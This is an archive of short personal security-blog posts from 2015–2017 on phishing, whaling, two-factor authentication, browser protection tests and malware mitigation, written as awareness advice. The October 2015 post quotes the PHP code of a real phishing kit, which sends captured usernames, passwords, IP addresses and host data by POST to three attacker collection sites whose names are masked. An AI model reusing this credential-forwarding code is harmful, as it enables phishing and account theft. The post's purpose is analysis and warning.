Tag Archives: Phishing

A lesson in Phishing and Two Factor Authentication

13 August 2017

The post ‘Hackers Hijack Popular Chrome Extension to Inject Code into Web Developers’ Browsers’ published on August 3, 2017 by Graham CLULEY at the Tripwire blog ‘The State Of Security‘ gives another good reason for the use of Two Factor Authentication.

Since phishing emails become better and better it is not surprising that even professionals can be tricked.

Thus I can fully accept the developer’s answer ‘I stupidly fell for a phishing attack on my Google account.’ to the question ‘Any idea how this could have happened?’.

But I cannot understand why the Google account was not secured with Two Factor Authentication (TFA), in particular because Google’s Push Notification makes life with TFA really easy.

With TFA enabled, this cyber attack could have been prevented.

Have a great week, and activate TFA for your Google account.

German firms lost millions of euros in ‘CEO Fraud’ scam: BSI

23 July 2017

The report ‘German firms lost millions of euros in ‘CEO Fraud’ scam: BSI’ published in the Reuters Technology News on 10 July 2017 makes me really worry. Whaling, a special form of spear phishing aimed on corporate executives, is not new at all. For some samples see this slide show on CIO.com.

It appears to me that in Germany the first line of defense, the employees, are not adequately prepared in the detection and the correct handling of phishing attacks, even though anti-phishing training is the most effective and cost efficient defensive measure in the fight against all kinds of phishing.

In addition, some rules are helpful and should be communicated to all employees:

  1. Users should never act on a business request from a company executive if the email is not signed with a company owned and valid email certificate.
  2. Users should never trust an email of a business partner if it is not signed with the partners valid email certificate.

Technical implementation is very easy, thus even SMB can use email signing in daily communication.

Have a great week.

Whaling emerges as major cybersecurity threat

3 December 2016

Whaling is a type of cyber fraud that targets mainly corporate executives. It is very closely related with phishing, thus not new. For a superb collection of examples see this slide show published on CIO.com.

As always, the combination of People, Process and Technology measures (PPT approach) is the best way to combat whaling:

People. The most effective way to deal with whaling is security awareness training. Include some whaling attacks in your anti-phishing training to raise awareness.

Processes. Enhance your information handling policy (IHP) or office manual. Add rules for the compliant handling of business requests by email:

  1. Users should never act on a business request from a company executive if the email is not signed with a company owned and valid email certificate.
  2. Never trust an email of a business partner when it is not signed with the partners valid email certificate.

Communicate the IHP to all users and train them in use and handling of email certificates.

Technology. Configure your email system such that all mails to external partners and at least all emails from company executives are signed with a valid email certificate.

With this, the risk of getting the victim of a whaling attack is greatly reduced.

Have a good weekend.

NSS Labs Tests Leading Web Browsers for Secure End User Experience

6 November 2016

On November 1, 2016 NSS Labs published the 2016 Web Browser Security Comparative Test Report.  Two tests with the most popular browsers (Google Chrome Version 53.0.2785, Microsoft Edge Version 38.14393.0.0 and Mozilla Firefox Version 48.0.2) had been run to check how effective they deal with socially engineered malware (SEM) and phishing attacks. The results are of interest for end-users because the inbuilt browser features were evaluated in the test.

When it comes to protection against phishing attacks the time needed until a URL is blocked is important. Microsoft Edge is the browser of choice, followed by Firefox and Chrome.

In the second test the protection against Socially Engineered Malware was evaluated. Again, the average time to block the malware is of great importance, and again, Microsoft Edge is the browser of choice, followed by Chrome and Firefox. The average time to block is 0.16 hours for Microsoft Edge, 2.66 hours for Chrome and 3.76 hours for Firefox.

Happy reading, and have a good weekend.

STOP.THINK.CONNECT

11 October 2015

The past week was full of exiting discoveries. I got some really well-crafted phishing emails. They used the same bizarre landing page design, but showed a somewhat different method in POST processing. Since one of the landing sites was open for everyone I had the chance to create a copy of the POST processing php procedure:

…
$data = "#$user#$pass#:#$ip#$browser#$hostname";
$sites=array("http://XXXXXX0.biz/usr.php","http://www.XXXXXXX1.com/usr.php","http://XXXXXXXX2.eu/usr.php");
function writeit($data,$site) { 
 global $textHos;
    $data = array('info' => $data);
    $options = array(
        'http' => array(
            'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data),
        ),
    );
    $context  = stream_context_create($options);
    $result = file_get_contents($site, false, $context);    
}
foreach ($sites as $site) {
    writeit($data,$site);
}

Most of the phishing sites I analyzed in the past months send an email message with username and password to the bad guys. In this case username and password are forwarded to 3 sites for further processing.

I checked the phishing landing pages with VirusTotal.com but found in most cases that the sites were not rated malicious. Even after 5 days only 10 of 65 scanners classify the pages as malicious or phishing site.

What surprised me was that most of the pages were listed on Blacklist databases. Check the landing page in a phishing mail with e.g. IP INDETAIL. It’s very likely that the site is already listed on a Blacklist.

And it’s really remarkable that browsers do not check blacklists before they direct the user to a phishing site. Information for making the world a safer place is abundant, unfortunately no one seems to be interested in creating actionable knowledge from it.

But there were also bright spots. I learned of the STOP.THINK.CONNECT campaign of the The Anti-Phishing Working Group (APWG) and National Cyber Security Alliance (NCSA). The campaign’s slogan is Keeping the web a safer place for everyone. The campaign provides lots of information about Two Factor Authentication and tips for safe usage of the internet. Take a look at the funny video clips.

Take care, and have a good week.

Mail apps facilitate phishing attacks

2 October 2015

Yesterday I received a really well-crafted phishing mail:

Phishing mail viewed in Windows Phone app

Windows Phone Mail App View

When viewed with mail apps on smartphones or tablets this well-made phishing mails look like the real thing.

Viewed with MS Outlook or a web mail client the sender information in the header makes it crystal clear that this email is a phishing attempt:

Phishing mail viewed in Outlook

Phishing mail viewed in Outlook

In my opinion most of the phishing attacks are easy to detect if email apps would offer the option to display at least the full <From> tag from the email header.

It’s hard to understand why Google, Apple and Microsoft make their customer’s life more difficult than necessary.

Have a good weekend!

Firefox Browser Console provides valuable hints on Phishing Sites

11 July 2015

When a serious company requests login data the network connection is always secured. Clear indicator of a secured network connection is that the URL starts with the https protocol. In addition, the certificate information besides the URL provides reliable information about the company and the site which runs the service.

Secure Connection Indicators

Secure Connection Indicators

The missing https protocol and certificate information in phishing URLs like http://videoservicesmiami.com/bolu/HOTMAILFILES/HOTMAILFILES/login.srf.htm is a clear indicator that someone tries to trick you.

Firefox Browser Console is a useful little helper in identifying phishing sites. Programmers use an input box of type password when they ask for a password. With this the Firefox programmers defined a simple rule:

Password fields present on an insecure (http://) page are a security risk.

When Firefox loads a phishing site the code on the site is inspected. Firefox detects an input box of type password and outputs a warning on the Browser Console because the network connection is not secured:

Firefox Browser Console Security Warning

Firefox Browser Console Security Warning. Click to enlarge.

I would appreciate it if the Firefox programmers would warn the users with a message box of such security risks, and block loading of such sites. This would be a great step forward because malicious URLs are often difficult to recognize in emails.

Take care!

Nomination for the “Most-Slanting-Phishing-Site-of-the-Year” award

10 July 2015

I am receiving about 20 phishing mails a week. Most attackers invest a lot of effort in their counterfeits but, sometimes they overshoot the mark. My July candidate for the Most-Slanting-Phishing-Site-of-the-Year award is:

Most-Slanting-Phishing-Site-of-the-Year award - July 2015 candidate

Most-Slanting-Phishing-Site-of-the-Year award – July 2015 candidate

Earlier this week the Italian company Hacking Team was hacked. The attackers made more than 400GB of confidential company data available to the public. The leaked data included tools and exploits provided by the company to carry out attacks, among them a new Flash Player zero day affecting Flash Player up to version 18.0.0.194.

Two critical vulnerabilities in as many weeks, that’s really annoying. The problem with the latest Flash Player attacks is that the payload is hidden in Flash Player SWF files. Thus, basically every SWF file might carry a malicious payload…

… It’s definitely time to solve the Flash Player problems once and for all.

Have a good weekend.

Some thoughts about ‘Mitigation strategies for data-wiping malware’

21 May 2015

In article ‘Mitigation strategies for data-wiping malware’ published on Security Think Tank in January 2015, Peter Wenham talks about mitigation strategies for data-wiping malware.

Peter’s proposals for creating a prevention strategy, training and strict refusal of local administrator access for employees, can be implemented quickly and at a fair price.

To complement this, companies should add a trusted zone concept for administrative tasks. A server administrator should never sign in to a server from a system at a lower trust level, e.g. from the laptop he uses to connect from outside the company network to a server. A trusted admin zone concept will prevent the lateral drift of attackers within the company network once they got access through e.g. a phishing attack and a RAT (Remote Access Trojan).

Have a good day!

Phishing is the attack vector #1.

18 April 2015

In report ‘Phishing email’ the key to hacking of TV5 Monde‘, published 14 April 2015 on thelocal.fr, we read:

“According to a source close to the investigation cited by Europe 1, the hack started with a “phishing” email that was sent to all journalists at the TV channel at the end of January.

Three journalists responded, allowing the hackers to infiltrate the channel’s system using so-called “Trojan Horse” malware (malicious software).”

You may remember the Anthem cyber-attack some weeks ago. The credentials of five employees were phished and used by the cyber attackers to steal millions of customer data sets. Cyber-attacks start very often with phishing emails. Even if only a few employees responds it always ends up in a catastrophe.

Would risk management have prevented the TV5 Monde attack? Definitely not!

In the TV5 Monde case it is very likely that the Trojan-Horse would have been detected by a proper configured Anti-Malware scanner on the mail-in server. For details please see my post ‘Free email providers are preferred distribution channels for malware’.

@Mr. Oettinger. It’s time to start a truly useful European initiative:

‘Email providers shall run an in-depth scan of every email when it is posted to the mail-in server. If an email contains malicious object it must be rejected!’

It is very likely that the TV5 Monde attack could have been prevented, if a next generation firewall would have been used to run an in-depth scan of the phishing mails.

Have a good weekend!

This morning in my garden.

This morning in my garden.